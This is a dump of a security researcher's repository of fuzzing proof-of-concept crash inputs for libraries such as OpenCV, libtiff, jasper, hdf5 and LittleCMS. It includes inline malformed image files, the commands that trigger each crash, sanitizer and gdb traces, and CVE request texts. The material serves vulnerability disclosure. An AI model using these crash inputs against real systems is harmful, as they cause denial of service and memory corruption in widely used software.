├── .gitignore ├── exiv2 ├── 8-readData-abort-1 ├── 7-printIFD-divbyzero-1 ├── 4-DataBuf-abort-1 ├── 1-string-format.jpg ├── 2-invalid-memory-access ├── 3-stringformat-outofbound-read ├── 5-printStructure-outbound-read-1 ├── 6-binaryToString-outbound-read-1 ├── 9-printStructure-outbound-read-1 └── 10-printStructure-outbound-read-2 ├── gegl ├── gegl-outbound-write-1 ├── gegl-dos-1 ├── gegl-dos-2 ├── gegl-dos-3 ├── gegl-outbound-write-2 └── readme.md ├── pics ├── bug8.PNG └── dos.PNG ├── cimg ├── cimg-crash-1 ├── cimg-double-free-1 ├── cimg-dos-load_bmp-1 ├── cimg-heap-overflow-1 ├── cimg-heap-overflow-load_bmp-48378 ├── cimg-heap-overflow-load_bmp-48397 ├── cimg-heap-overflow-load_bmp-48413 ├── cimg-heap-overflow-load_bmp-48427 ├── cimg-heap-overflow-load_bmp-48457 └── readme.md ├── netpbm ├── pstopnm-divbyzero-2 ├── pstopnm-divbyzero-1 ├── pbmmask-heapoverflow-1 ├── tifftopnm-heapoverflow-1 ├── images │ └── pstopnm-divbyzero-1.png └── readme.md ├── cms ├── 9-cms-heap-overflow ├── 8-cms-crash-UnrollDoubleTo16 ├── 6-cms-invalid-access-Pack3Bytes ├── tiff-crash-TIFFWriteEncodeTile ├── 13-cms-null-pointer-FastIdentity16 ├── 15-cms-null-pointer-UnrollAnyWords ├── 5-cms-invalid-access-cmsReadHeader ├── 10-cms-invalid-read-PackPlanarBytes ├── 12-cms-invalid-access-EvaluateCurves ├── 1-cms-out-bound-write-PrecalculateXFORM ├── 3-cms-NULL-Pointer-cmsEvalToneCurve16 ├── 14-cms-invalid-access-Unroll1ByteReversed ├── 4-cms-invalid-access-AllocateToneCurveStruct ├── 11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages ├── 7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages └── readme.md ├── gifsicle ├── gifsicle-poc-1 └── readme.md ├── hdf5 ├── images │ ├── null-1.png │ ├── null-2.png │ ├── divzero-1.PNG │ ├── divzero-2.PNG │ ├── outboundread-1.png │ ├── outboundread-2.png │ ├── outboundread-3.png │ ├── outboundread-4.png │ └── hdf5-heapoverflow.png ├── 1-hdf5-divbyzero-H5T_set_loc ├── 2-hdf5-null-pointer-H5O_pline_decode ├── 3-hdf5-outbound-read-H5T_conv_struct_opt ├── 
5-hdf5-heap-overflow-H5G__ent_decode_vec ├── 4-hdf5-outbound-read-H5Opline_pline_decode └── readme.md ├── libtiff ├── 1-tiffinfo-c-null └── readme.md ├── jasper ├── 001-jasper-aborted-1 ├── 002-jasper-aborted-2 ├── 003-jasper-aborted-3 ├── 004-jasper-aborted-4 ├── 005-jasper-aborted-5 ├── 006-jasper-aborted-6 └── 026-jasper-jps_decode-heapoverflow ├── libav ├── 1-avconv-divbyzero.wav ├── 1-avconv-divbyzero.flac └── readme.md ├── opencv ├── dos-by-assert │ ├── dos-1 │ ├── dos-2 │ ├── dos-3 │ └── readme.md ├── 11-opencv-dos-cpu-exhaust ├── 10-opencv-dos-memory-exhaust ├── 2-opencv-heapoverflow-fseek ├── 8-opencv-invalid-read-fread ├── 4-buf-overflow-readData-memcpy ├── 6-opencv-outbound-write-readData ├── 7-opencv-outbound-write-FillUnicolor ├── 1-opencv-outbound-write-FillColorRow4 ├── 12-opencv-outbound-write-FillColorRow1 ├── 3-opencv-outbound-write-FillColorRow8 ├── 5-opencv-outbound-write-FillColorRow1 ├── 9-opencv-invalid-write-icvCvt_BGRA2BGR_8u_C4C3R ├── 13-opencv-10h-dos └── readme.md ├── openexr └── 185-openexr-heapoverflow ├── cve-request ├── cve-request-3.txt ├── cve-request-2.txt └── cve-request-1.txt ├── README.md~ ├── jasper.md ├── README.md └── openexr.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | peda* 3 | cve-request/* 4 | -------------------------------------------------------------------------------- /exiv2/8-readData-abort-1: -------------------------------------------------------------------------------- 1 | II+ -------------------------------------------------------------------------------- /exiv2/7-printIFD-divbyzero-1: -------------------------------------------------------------------------------- 1 | II+ -------------------------------------------------------------------------------- /gegl/gegl-outbound-write-1: -------------------------------------------------------------------------------- 1 | P6 2 | 725583137+4 3 | 255 
-------------------------------------------------------------------------------- /pics/bug8.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/pics/bug8.PNG -------------------------------------------------------------------------------- /pics/dos.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/pics/dos.PNG -------------------------------------------------------------------------------- /gegl/gegl-dos-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-dos-1 -------------------------------------------------------------------------------- /gegl/gegl-dos-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-dos-2 -------------------------------------------------------------------------------- /gegl/gegl-dos-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-dos-3 -------------------------------------------------------------------------------- /cimg/cimg-crash-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-crash-1 -------------------------------------------------------------------------------- /netpbm/pstopnm-divbyzero-2: -------------------------------------------------------------------------------- 1 | %!PS.0 EPS) 2 | 3 | %%C15) 4 | %%BoundingBox: 0 2 113737 3 -------------------------------------------------------------------------------- /cimg/cimg-double-free-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-double-free-1 
-------------------------------------------------------------------------------- /cms/9-cms-heap-overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/9-cms-heap-overflow -------------------------------------------------------------------------------- /exiv2/4-DataBuf-abort-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/4-DataBuf-abort-1 -------------------------------------------------------------------------------- /gifsicle/gifsicle-poc-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gifsicle/gifsicle-poc-1 -------------------------------------------------------------------------------- /hdf5/images/null-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/null-1.png -------------------------------------------------------------------------------- /hdf5/images/null-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/null-2.png -------------------------------------------------------------------------------- /cimg/cimg-dos-load_bmp-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-dos-load_bmp-1 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-1 -------------------------------------------------------------------------------- /exiv2/1-string-format.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/1-string-format.jpg -------------------------------------------------------------------------------- /hdf5/images/divzero-1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/divzero-1.PNG -------------------------------------------------------------------------------- /hdf5/images/divzero-2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/divzero-2.PNG -------------------------------------------------------------------------------- /libtiff/1-tiffinfo-c-null: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/libtiff/1-tiffinfo-c-null -------------------------------------------------------------------------------- /netpbm/pstopnm-divbyzero-1: -------------------------------------------------------------------------------- 1 | %!PS.0 EPSF-3.0 2 | ew) 3 | 4 | %%C15) 5 | %%BoundingBox: 0 3 137 3 -------------------------------------------------------------------------------- /gegl/gegl-outbound-write-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-outbound-write-2 -------------------------------------------------------------------------------- /jasper/001-jasper-aborted-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/001-jasper-aborted-1 -------------------------------------------------------------------------------- /jasper/002-jasper-aborted-2: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/002-jasper-aborted-2 -------------------------------------------------------------------------------- /jasper/003-jasper-aborted-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/003-jasper-aborted-3 -------------------------------------------------------------------------------- /jasper/004-jasper-aborted-4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/004-jasper-aborted-4 -------------------------------------------------------------------------------- /jasper/005-jasper-aborted-5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/005-jasper-aborted-5 -------------------------------------------------------------------------------- /jasper/006-jasper-aborted-6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/006-jasper-aborted-6 -------------------------------------------------------------------------------- /libav/1-avconv-divbyzero.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/libav/1-avconv-divbyzero.wav -------------------------------------------------------------------------------- /opencv/dos-by-assert/dos-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/dos-by-assert/dos-1 -------------------------------------------------------------------------------- /opencv/dos-by-assert/dos-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/dos-by-assert/dos-2 
-------------------------------------------------------------------------------- /opencv/dos-by-assert/dos-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/dos-by-assert/dos-3 -------------------------------------------------------------------------------- /exiv2/2-invalid-memory-access: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/2-invalid-memory-access -------------------------------------------------------------------------------- /hdf5/images/outboundread-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-1.png -------------------------------------------------------------------------------- /hdf5/images/outboundread-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-2.png -------------------------------------------------------------------------------- /hdf5/images/outboundread-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-3.png -------------------------------------------------------------------------------- /hdf5/images/outboundread-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-4.png -------------------------------------------------------------------------------- /libav/1-avconv-divbyzero.flac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/libav/1-avconv-divbyzero.flac 
-------------------------------------------------------------------------------- /netpbm/pbmmask-heapoverflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/netpbm/pbmmask-heapoverflow-1 -------------------------------------------------------------------------------- /cms/8-cms-crash-UnrollDoubleTo16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/8-cms-crash-UnrollDoubleTo16 -------------------------------------------------------------------------------- /hdf5/1-hdf5-divbyzero-H5T_set_loc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/1-hdf5-divbyzero-H5T_set_loc -------------------------------------------------------------------------------- /hdf5/images/hdf5-heapoverflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/hdf5-heapoverflow.png -------------------------------------------------------------------------------- /netpbm/tifftopnm-heapoverflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/netpbm/tifftopnm-heapoverflow-1 -------------------------------------------------------------------------------- /opencv/11-opencv-dos-cpu-exhaust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/11-opencv-dos-cpu-exhaust -------------------------------------------------------------------------------- /openexr/185-openexr-heapoverflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/openexr/185-openexr-heapoverflow 
-------------------------------------------------------------------------------- /cms/6-cms-invalid-access-Pack3Bytes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/6-cms-invalid-access-Pack3Bytes -------------------------------------------------------------------------------- /cms/tiff-crash-TIFFWriteEncodeTile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/tiff-crash-TIFFWriteEncodeTile -------------------------------------------------------------------------------- /opencv/10-opencv-dos-memory-exhaust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/10-opencv-dos-memory-exhaust -------------------------------------------------------------------------------- /opencv/2-opencv-heapoverflow-fseek: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/2-opencv-heapoverflow-fseek -------------------------------------------------------------------------------- /opencv/8-opencv-invalid-read-fread: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/8-opencv-invalid-read-fread -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48378: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48378 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48397: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48397 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48413: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48413 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48427: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48427 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48457: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48457 -------------------------------------------------------------------------------- /cms/13-cms-null-pointer-FastIdentity16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/13-cms-null-pointer-FastIdentity16 -------------------------------------------------------------------------------- /cms/15-cms-null-pointer-UnrollAnyWords: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/15-cms-null-pointer-UnrollAnyWords -------------------------------------------------------------------------------- /cms/5-cms-invalid-access-cmsReadHeader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/5-cms-invalid-access-cmsReadHeader -------------------------------------------------------------------------------- /exiv2/3-stringformat-outofbound-read: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/3-stringformat-outofbound-read -------------------------------------------------------------------------------- /exiv2/5-printStructure-outbound-read-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/5-printStructure-outbound-read-1 -------------------------------------------------------------------------------- /exiv2/6-binaryToString-outbound-read-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/6-binaryToString-outbound-read-1 -------------------------------------------------------------------------------- /exiv2/9-printStructure-outbound-read-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/9-printStructure-outbound-read-1 -------------------------------------------------------------------------------- /netpbm/images/pstopnm-divbyzero-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/netpbm/images/pstopnm-divbyzero-1.png -------------------------------------------------------------------------------- /opencv/4-buf-overflow-readData-memcpy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/4-buf-overflow-readData-memcpy -------------------------------------------------------------------------------- /cms/10-cms-invalid-read-PackPlanarBytes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/10-cms-invalid-read-PackPlanarBytes 
-------------------------------------------------------------------------------- /cms/12-cms-invalid-access-EvaluateCurves: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/12-cms-invalid-access-EvaluateCurves -------------------------------------------------------------------------------- /exiv2/10-printStructure-outbound-read-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/10-printStructure-outbound-read-2 -------------------------------------------------------------------------------- /opencv/6-opencv-outbound-write-readData: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/6-opencv-outbound-write-readData -------------------------------------------------------------------------------- /cms/1-cms-out-bound-write-PrecalculateXFORM: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/1-cms-out-bound-write-PrecalculateXFORM -------------------------------------------------------------------------------- /cms/3-cms-NULL-Pointer-cmsEvalToneCurve16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/3-cms-NULL-Pointer-cmsEvalToneCurve16 -------------------------------------------------------------------------------- /hdf5/2-hdf5-null-pointer-H5O_pline_decode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/2-hdf5-null-pointer-H5O_pline_decode -------------------------------------------------------------------------------- /jasper/026-jasper-jps_decode-heapoverflow: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/026-jasper-jps_decode-heapoverflow -------------------------------------------------------------------------------- /opencv/7-opencv-outbound-write-FillUnicolor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/7-opencv-outbound-write-FillUnicolor -------------------------------------------------------------------------------- /cms/14-cms-invalid-access-Unroll1ByteReversed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/14-cms-invalid-access-Unroll1ByteReversed -------------------------------------------------------------------------------- /hdf5/3-hdf5-outbound-read-H5T_conv_struct_opt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/3-hdf5-outbound-read-H5T_conv_struct_opt -------------------------------------------------------------------------------- /hdf5/5-hdf5-heap-overflow-H5G__ent_decode_vec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/5-hdf5-heap-overflow-H5G__ent_decode_vec -------------------------------------------------------------------------------- /opencv/1-opencv-outbound-write-FillColorRow4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/1-opencv-outbound-write-FillColorRow4 -------------------------------------------------------------------------------- /opencv/12-opencv-outbound-write-FillColorRow1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/12-opencv-outbound-write-FillColorRow1 
-------------------------------------------------------------------------------- /opencv/3-opencv-outbound-write-FillColorRow8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/3-opencv-outbound-write-FillColorRow8 -------------------------------------------------------------------------------- /opencv/5-opencv-outbound-write-FillColorRow1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/5-opencv-outbound-write-FillColorRow1 -------------------------------------------------------------------------------- /cms/4-cms-invalid-access-AllocateToneCurveStruct: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/4-cms-invalid-access-AllocateToneCurveStruct -------------------------------------------------------------------------------- /hdf5/4-hdf5-outbound-read-H5Opline_pline_decode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/4-hdf5-outbound-read-H5Opline_pline_decode -------------------------------------------------------------------------------- /opencv/9-opencv-invalid-write-icvCvt_BGRA2BGR_8u_C4C3R: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/9-opencv-invalid-write-icvCvt_BGRA2BGR_8u_C4C3R -------------------------------------------------------------------------------- /cms/11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages -------------------------------------------------------------------------------- 
/cms/7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages -------------------------------------------------------------------------------- /libav/readme.md: -------------------------------------------------------------------------------- 1 | libav pocs 2 | =========== 3 | 4 | ## 1-avconv-divbyzero 5 | 6 | gdb --args ../avconv -i 1-avconv-divbyzero.wav -i 1-avconv-divbyzero.flac -f avi merge.avi 7 | 8 | 9 | Program received signal SIGFPE, Arithmetic exception. 10 | 0x000000000046b38b in process_input_packet (ist=0x6cdd60, no_eof=no_eof@entry=0, pkt=0x0) 11 | at avtools/avconv.c:1586 12 | 1586 ist->next_dts += ((int64_t)AV_TIME_BASE * ist->dec_ctx->frame_size) / 13 | 1587 ist->dec_ctx->sample_rate; 14 | 15 | 16 | ref: 17 | https://bugzilla.libav.org/show_bug.cgi?id=1117 18 | -------------------------------------------------------------------------------- /cve-request/cve-request-3.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | 3 | OpenCV (http://opencv.org/) 4 | OpenCV (Open Source Computer Vision Library) 5 | versions up to and including 3.3 6 | 7 | OpenCV (Open Source Computer Vision Library) is an open source computer vision and machine learning software library. 8 | A heap-based buffer overflow results in an invalid write in fseek when an image file is read with cv::imread. 9 | 10 | OpenCV (Open Source Computer Vision Library) is an open source computer vision and machine learning software library. 11 | An out-of-bounds write occurs in the function FillColorRow4 when an image file is read with cv::imread. 12 | 13 | 14 | These bugs were found by Qixue Xiao and Kang Li.
15 | 16 | 17 | https://github.com/opencv/opencv/issues/9309 18 | https://github.com/xiaoqx/pocs/blob/master/opencv.md 19 | https://github.com/xiaoqx/pocs/blob/master/opencv/1-opencv-outbound-write-FillColorRow4 20 | -------------------------------------------------------------------------------- /hdf5/readme.md: -------------------------------------------------------------------------------- 1 | hdf5 pocs 2 | ============= 3 | 4 | 5 | ## 1-hdf5-divbyzero-H5T_set_loc 6 | 7 | ./hdf5dump 1-hdf5-divbyzero-H5T_set_loc 8 | 9 | ![](./images/divzero-1.PNG) 10 | 11 | ![](./images/divzero-2.PNG) 12 | 13 | ## 2-hdf5-null-pointer-H5O_pline_decode 14 | 15 | ./hdf5dump 2-hdf5-null-pointer-H5O_pline_decode 16 | 17 | ![](./images/null-1.png) 18 | 19 | ![](./images/null-2.png) 20 | 21 | 22 | ## 3-hdf5-outbound-read-H5T_conv_struct_opt 23 | 24 | ./hdf5dump 3-hdf5-outbound-read-H5T_conv_struct_opt 25 | 26 | ![](./images/outboundread-1.png) 27 | 28 | ![](./images/outboundread-2.png) 29 | 30 | 31 | ## 4-hdf5-outbound-read-H5Opline_pline_decode 32 | 33 | ./hdf5dump 4-hdf5-outbound-read-H5Opline_pline_decode 34 | 35 | ![](./images/outboundread-3.png) 36 | 37 | ![](./images/outboundread-4.png) 38 | 39 | 40 | 41 | ## 5-hdf5-heap-overflow-H5G__ent_decode_vec 42 | 43 | ./hdf5dump 5-hdf5-heap-overflow-H5G__ent_decode_vec 44 | 45 | ![](./images/hdf5-heapoverflow.png) 46 | 47 | 48 | -------------------------------------------------------------------------------- /opencv/13-opencv-10h-dos: -------------------------------------------------------------------------------- 1 | P1 .111111111111111111111111111111 
11G1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111#111 -------------------------------------------------------------------------------- /libtiff/readme.md: -------------------------------------------------------------------------------- 1 | poc of libtiff 2 | ================= 3 | 4 | 5 | ## 1. null pointer dereference of tiffinfo (1-tiffinfo-c-null) 6 | 7 | A NULL Pointer Dereference in function TIFFPrintDirectory in tif_print.c 8 | when using tiffinfo tool to print the crafted tiff information. 
9 | 10 | ``` 11 | $ tiffinfo -c $FILE 12 | 13 | ASAN:SIGSEGV 14 | ================================================================= 15 | ==172==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3b8f83a44f bp 0x000000000000 sp 0x7ffd7cacd6b0 T0) 16 | #0 0x7f3b8f83a44e in TIFFPrintDirectory /src/libtiff/libtiff/tif_print.c:549 17 | #1 0x402329 in tiffinfo /src/libtiff/tools/tiffinfo.c:461 18 | #2 0x402329 in main /src/libtiff/tools/tiffinfo.c:150 19 | #3 0x7f3b8f2ce82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 20 | #4 0x402888 in _start (/src/aflbuild/installed/bin/tiffinfo+0x402888) 21 | 22 | AddressSanitizer can not provide additional info. 23 | SUMMARY: AddressSanitizer: SEGV /src/libtiff/libtiff/tif_print.c:549 TIFFPrintDirectory 24 | ==172==ABORTING 25 | 26 | 27 | ``` 28 | 29 | ref: 30 | 31 | http://bugzilla.maptools.org/show_bug.cgi?id=2778 32 | -------------------------------------------------------------------------------- /README.md~: -------------------------------------------------------------------------------- 1 | # pocs 2 | pocs of tested targets 3 | 4 | ### 001-jasper-aborted-1 5 | ``` 6 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 7 | Aborted 8 | ``` 9 | 10 | 11 | ### 002-jasper-aborted-2 12 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 13 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 14 | Aborted 15 | 16 | 17 | ### 003-jasper-aborted-3 18 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 19 | warning: ignoring unknown marker segment (0xffff) 20 | type = 0xffff (UNKNOWN); len = 19;40 40 48 48 50 48 48 50 48 48 50 48 48 45 48 48 50 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertio 21 | n `qmfbid == 0x01' failed. 
22 | Aborted 23 | 24 | ### 004-jasper-aborted-4 25 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 26 | warning: trailing garbage in marker segment (15 bytes) 27 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 28 | Aborted 29 | 30 | ### 005-jasper-aborted-5 31 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 32 | warning: ignoring trailing garbage (1 bytes) 33 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 34 | Aborted 35 | 36 | ### 006-jasper-aborted-6 37 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 38 | warning: ignoring unknown marker segment (0xff7e) 39 | type = 0xff7e (UNKNOWN); len = 20;01 40 40 ff ff 80 00 48 50 40 48 50 48 48 50 48 48 50 warning: trailing garbage in marker segment (1 bytes) 40 | warning: ignoring unknown marker segment (0xff0d) 41 | type = 0xff0d (UNKNOWN); len = 20;00 40 40 00 00 00 00 00 00 00 00 e9 00 ff 80 e9 00 00 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 42 | Aborted 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /jasper.md: -------------------------------------------------------------------------------- 1 | # pocs 2 | pocs of libjasper 3 | 4 | ### 001-jasper-aborted-1 5 | ``` 6 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 7 | Aborted 8 | ``` 9 | 10 | 11 | ### 002-jasper-aborted-2 12 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 13 | ``` 14 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 
